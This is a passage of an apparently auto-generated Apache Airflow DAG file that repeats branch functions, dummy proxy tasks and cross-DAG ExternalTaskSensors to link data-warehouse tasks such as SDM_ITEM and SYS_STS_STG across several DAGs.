up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE","D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE","D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE"
D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_EQT_EXPENSE",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE)
D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE)
def branch_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP","D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP","D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"
proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP"
D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_EPR_MFG_SAMPLE_BUILD_EXP",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP)
D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP)
def branch_D_DM_PRDxD_SDM_PRD__SDM_ITEM(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM","D_DM_PRDxD_SDM_PRD__SDM_ITEM"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM","D_DM_PRDxD_SDM_PRD__SDM_ITEM"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ITEM"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ITEM= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_ITEM,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM"
proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_ITEM"
D_DM_PRDxD_SDM_PRD__SDM_ITEM= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_ITEM",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ITEM.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ITEM.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_ITEM)
D_DM_PRDxD_SDM_PRD__SDM_ITEM.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM)
def branch_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY","D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY","D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"
proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY"
D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_PLM_CATEGORY",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY)
D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY)
def branch_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON","D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON","D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"
proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON"
D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_ECN_REASON",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON)
D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON)
def branch_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_PRD")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE","D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE","D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"]
return ["proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"]
my_taskid = "BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE,
dag=D_DM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"
proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_PRD,
)
# Cross dag sensor
my_taskid = "D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE"
D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_PRD",
external_task_id="SDM_PROJECT_CODE",
mode="reschedule",
dag=D_DM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE)
BRANCH_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE.set_downstream(D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE)
D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE.set_downstream(proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE)
def branch_D_ODS_CUSxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG","D_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG","D_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_CUSxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_CUSxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_CUSxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_CUS,
provide_context=True,
)
my_taskid = "proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_CUS,
)
# Cross dag sensor
my_taskid = "D_ODS_CUSxD_STG_INIT__SYS_STS_STG"
D_ODS_CUSxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_CUS,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_CUSxD_STG_INIT__SYS_STS_STG)
D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_GBDxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG","D_ODS_GBDxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG","D_ODS_GBDxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_GBDxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_GBDxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_GBDxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_GBD,
provide_context=True,
)
my_taskid = "proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_GBD,
)
# Cross dag sensor
my_taskid = "D_ODS_GBDxD_STG_INIT__SYS_STS_STG"
D_ODS_GBDxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_GBD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_GBDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_GBDxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_GBDxD_STG_INIT__SYS_STS_STG)
D_ODS_GBDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_HRMxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG","D_ODS_HRMxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG","D_ODS_HRMxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_HRMxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_HRMxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_HRMxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_HRM,
provide_context=True,
)
my_taskid = "proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_HRM,
)
# Cross dag sensor
my_taskid = "D_ODS_HRMxD_STG_INIT__SYS_STS_STG"
D_ODS_HRMxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_HRM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_HRMxD_STG_INIT__SYS_STS_STG)
D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_MFGxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG","D_ODS_MFGxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG","D_ODS_MFGxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_MFGxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_MFGxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_MFGxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_MFG,
provide_context=True,
)
my_taskid = "proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_MFG,
)
# Cross dag sensor
my_taskid = "D_ODS_MFGxD_STG_INIT__SYS_STS_STG"
D_ODS_MFGxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_MFG,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_MFGxD_STG_INIT__SYS_STS_STG)
D_ODS_MFGxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_MFGxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_PRDxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG","D_ODS_PRDxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG","D_ODS_PRDxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_PRDxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_PRDxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_PRDxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_PRD,
provide_context=True,
)
my_taskid = "proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_PRD,
)
# Cross dag sensor
my_taskid = "D_ODS_PRDxD_STG_INIT__SYS_STS_STG"
D_ODS_PRDxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_PRDxD_STG_INIT__SYS_STS_STG)
D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_QAMxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG","D_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG","D_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_QAMxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_QAMxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_QAMxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_QAM,
provide_context=True,
)
my_taskid = "proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
